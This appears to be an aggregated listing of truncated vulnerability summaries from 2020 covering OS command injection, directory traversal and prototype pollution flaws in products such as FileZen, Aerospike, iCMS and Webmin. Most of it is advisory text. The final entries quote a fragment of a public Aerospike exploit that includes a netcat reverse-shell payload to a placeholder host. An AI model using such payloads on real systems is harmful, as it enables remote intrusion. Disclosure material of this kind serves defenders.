CVE-2020-5639

Directory traversal vulnerability in FileZen versions from V3.0.0 to V4.2.2 allows remote attackers to upload an arbitrary file in a specific directory via unspecified vectors. As a result, an arbitrary OS command may be executed...

CVE-2020-12149

CVE-2020-12149 affects Silver Peak Unity ECOS appliances and relates to a command injection in the configuration backup/restore function. The root cause is that the user-controlled config filename is incorporated directly into a subsequent shell command, enabling an authenticated attacker with ac...

CVE-2020-12149 OS Command Injection - Management File Upload

The configuration backup/restore function in Silver Peak Unity ECOSTM ECOS appliance software was found to directly incorporate the user-controlled config filename in a subsequent shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. This...

Aerospike Database UDF Lua Code Execution Exploit

Aerospike Database versions before 5.1.0.3 permitted user-defined functions UDF to call the os.execute Lua function. This Metasploit module creates a UDF utilizing this function to execute arbitrary operating system commands with the privileges of the user running the Aerospike service. This modu...

JVN#55917325: Multiple vulnerabilities in Aterm SA3500G

Aterm SA3500G provided by NEC Corporation contains multiple vulnerabilities listed below. OS command injection CWE-78 - CVE-2020-5635 Version| Vector| Score ---|---|--- CVSS v3| CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H| Base Score: 8.8 CVSS v2| AV:A/AC:L/Au:N/C:P/I:P/A:P| Base Score: 5.8 OS...

The vulnerability of the Xstream Java library for converting objects to XML or JSON format arises from the lack of measures taken to eliminate special elements used in operating system commands. This vulnerability allows attackers to execute arbitrary code.

The vulnerability of the Java library for converting objects to XML or JSON format, Xstream, exists due to the lack of measures taken to eliminate special elements used in the operating system command. Exploiting this vulnerability can allow a remote attacker to execute arbitrary code...

CVE-2020-19527

iCMS 7.0.14 attackers to execute arbitrary OS commands via shell metacharacters in the DBNAME parameter to install/install.php...

CVE-2020-19142

iCMS 7 attackers to execute arbitrary OS commands via shell metacharacters in the DBPREFIX parameter to install/install.php...

CVE-2020-19142

The CVE-2020-19142 entry describes a vulnerability in iCMS 7 where an attacker can execute arbitrary OS commands by injecting shell metacharacters into the DB_PREFIX parameter used by install/install.php. The issue permits unauthenticated remote command execution with high to critical impact (as ...

CVE-2020-19527

iCMS 7.0.14 attackers to execute arbitrary OS commands via shell metacharacters in the DBNAME parameter to install/install.php...

CVE-2020-19527

CVE-2020-19527 affects iCMS 7.0.14. An attacker can execute arbitrary OS commands by injecting shell metacharacters into the DB_NAME parameter in install/install.php. Documented impact is critical (C/H/I/A) with network attack vector and no user interaction. No remediation/version details are pro...

FileZen vulnerable to directory traversal

Overview FileZen provided by Soliton Systems K.K. is an appliance for secure file transfer and sharing by mail or an web interface. FileZen contains a directory traversal vulnerability CWE-22. Soliton Systems K.K. reported this vulnerability to IPA to notify users of its solution through JVN...

JVN#12884935: FileZen vulnerable to directory traversal

FileZen provided by Soliton Systems K.K. is an appliance for secure file transfer and sharing by mail or an web interface. FileZen contains a directory traversal vulnerability CWE-22. Impact A remote attacker may upload an arbitrary file in the specific directory in the product. If a specialy...

Cisco Jabber Operating System Command Injection Vulnerability

Cisco Jabber for Windows and Cisco Jabber are both products of the U.S. Cisco Cisco.Cisco Jabber for Windows is a set of unified communications client solutions for the Windows platform. The program provides online status display, instant messaging, voice and other functions.Cisco Jabber is a...

Exploit for OS Command Injection in Webmin

CVE-2019-15107 This repo contains a small script in bash to e...

Prototype Pollution

systeminformation is vulnerable to prototype pollution. An attacker is able to overwrite arbitrary properties and functions of an object such as prototype or proto, potentially resulting in OS command execution...

Design/Logic Flaw

This affects the package systeminformation before 4.30.2. The attacker can overwrite the properties and functions of an object, which can lead to executing OS commands...

CVE-2020-7778

This affects the package systeminformation before 4.30.2. The attacker can overwrite the properties and functions of an object, which can lead to executing OS commands...

Aerospike Database 5.1.0.3 Remote Command Execution

Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution Date: 2020-08-01 Exploit Author: Matt S Vendor Homepage: https://www.aerospike.com/ Version: &1|nc ip port /tmp/ft&' def getclientcfg: try: return aerospike.client 'hosts': cfg.ahost, cfg.aport, 'policies': 'timeout': 8000.connect...

Aerospike Database 5.1.0.3 - OS Command Execution

Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution Date: 2020-08-01 Exploit Author: Matt S Vendor Homepage: https://www.aerospike.com/ Version: &1|nc ip port /tmp/ft&' def getclientcfg: try: return aerospike.client 'hosts': cfg.ahost, cfg.aport, 'policies': 'timeout': 8000.connect...